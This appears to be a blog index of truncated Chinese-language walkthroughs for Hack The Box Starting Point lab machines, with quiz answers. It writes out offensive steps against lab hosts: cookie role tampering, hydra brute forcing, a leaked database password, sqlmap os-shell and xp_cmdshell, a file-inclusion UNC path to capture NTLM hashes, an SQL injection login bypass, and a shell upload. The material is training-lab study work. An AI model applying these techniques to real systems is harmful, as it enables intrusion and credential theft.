Hack The Box :: Starting Point - Oopsie
扫描发现22,80开放nmap -sV 10.129.114.125 访问web,发现/cdn-cgi/login/路径 另外爆破路径可以用gobuster,成功率取决与字典gobuster dir -u http://10.129.114.125 -w 字典路径 访问http://10.129.114.125/cdn-cgi/login/ , 有个login as guest 页面Account url id=2,替换为1会是什么样呢 cookies 修改cookie值,role为admin, user为34322刷新 ,可以发现upload可以上传东西 也可以对登陆页面可以暴力破解,但是通过上面的绕过更方便可以用burpsuite也可以用hydra 登录并查看请求信息 请求地址 http://10.129.114.125/cdn-cgi/login/index.php post的数据username=admin&password=1 hydra -l admin -P pass.txt -f 10.129.41.170 h...
Hack The Box :: Starting Point - Archetype
扫描nmap 10.129.95.187 -sV 查看smb共享目录smbclient -L 10.129.95.187 获取共享文件,看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123smbclient \\\\10.129.95.187\\backups ls get prod.dtsConfig 使用smbclient.py进行数据库连接,也可以用sqlmap,sqlmap更方便一些https://github.com/fortra/impacket #msclientpython mssqlclient.py [email protected] -windows-auth#sqlmapsqlmap -d "mssql://ARCHETYPE\\sql_svc:[email protected]:1433/" --os-shell 使用sql命令开启xp_cmdshell执行系统命令效果和sqlmap的一样,二选一即可enable_xp_cmdshellRECON...
Hack The Box :: Starting Point - Three
扫描nmap -T4 -Pn -sVC -p- 10.129.27.183 开放端口22, 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb 根据提示写入域名到hosts,然后爆破子域名echo "10.129.27.183 thetoppers.htb" >> /etc/hostsgobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts 一开始题目提示是 s3.thetoppers.htb 安装AWS客户端apt install awscli -yaws configure # 配置 上传shellaws --endpoint=http://s3.thetop...
Hack The Box :: Starting Point - Responder
端口扫描,发现端口80,直接访问跳转到 unika.htbnmap 10.129.216.188nmap 10.129.216.188 -A -p 80 -Pn 修改本地host文件,之后直接访问域名echo "10.129.216.188 unika.htb" >> /etc/hosts 可以看到版本语言为php 页面点击语言切换, 提示在page参数存在本地文件包含../../../../../../../../windows/system32/drivers/etc/hosts //10.10.14.6/somefile 获取NTLM hash修改http://unika.htb/index.php?page=//自己的IP地址/somefile ip a # 比如我这里是10.10.16.130 抓包responder -I tun0 把 hash值存入文件vim hash.txt hash.txt Administrator::RESPONDER:776ede6a755707fe:95E2B1BB3B...
Hack The Box :: Starting Point - Crocodile
端口扫描nmap 10.129.171.69nmap 10.129.171.69 -A -p 21,80 允许匿名用户登录, 并且存在两个文件ftp 10.129.171.69 Anonymous #登录 ls #列出目录 get allowed.userlist get allowed.userlist.passwd exitcat allowed.userlistcat allowed.userlist.passwd 浏览80端口 爆破路径gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php 用上面文件的信息登录下,获得flag Task 1 What Nmap scanning switch employs the use of default scripts during a scan? -sC Task 2 What service version i...
Hack The Box :: Starting Point - Sequel
扫描, 发现3306端口开放nmap -A 10.129.95.232 弱密码,密码为空,如果破解其他密码可以把 -e nsr 换成字典路径即可ydra -l root -e nsr mysql://10.129.95.232 登录mysqlmysql -uroot -h 10.129.95.232 show databases; #列数据库 use htb; #切换数据库 show tables; # 列表 select * from config; #获取表中数据 Task 1 During our scan, which port do we find serving MySQL? 3306 Task 2 What community-developed MySQL version is the target running? MariaDB Task 3 When using the MySQL command line client, what...
Hack The Box :: Starting Point - Appointment
端口扫描nmap -sV 10.129.24.207 页面为登录页面,根据提示为SQL注入,尝试用 ‘ or 1=1;# 测试admin1' or 1=1;# Task 1 What does the acronym SQL stand for? Structured Query Language Task 2 What is one of the most common type of SQL vulnerabilities? sql injection Task 3 What does PII stand for? personally identifiable information Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection Task 5 What does Nmap report as the service and version that are running on port...
Hack The Box :: Starting Point - Redeemer
Which TCP port is open on the machine? 6379 扫描 map -p- --min-rate 5000 -sV 10.129.241.156 --open Which service is running on the port that is open on the machine? redis What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database In-memory Database Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments. redis-cli Which flag is used wi...
Hack The Box :: Starting Point - Dancing
扫描nmap --open 10.129.1.125 查看smb服务smbclient -L 10.129.1.125#smbclient \\\\IP\\共享目录smbclient \\\\10.129.1.125\\WorkShares ls #dir也是可以的 TASK 1 What does the 3-letter acronym SMB stand for? server message block TASK 2 What port does SMB use to operate at? 445 TASK 3 What is the service name for port 445 that came up in our Nmap scan? microsoft-ds TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share? -L TASK 5 How many shares are...
Hack The Box :: Starting Point - Fawn
扫描nmap --open 10.129.26.35nmap -A -p 21 10.129.26.35 获取flagftp 10.129.26.35 anonymous ls get flag.txt cat flag.txt TASK 1 What does the 3-letter acronym FTP stand for? File Transfer Protocol TASK 2 Which port does the FTP service listen on usually? 21 TASK 3 What acronym is used for the secure version of FTP? SFTP TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target? ping TASK 5 From your scans, what version is FTP ru...












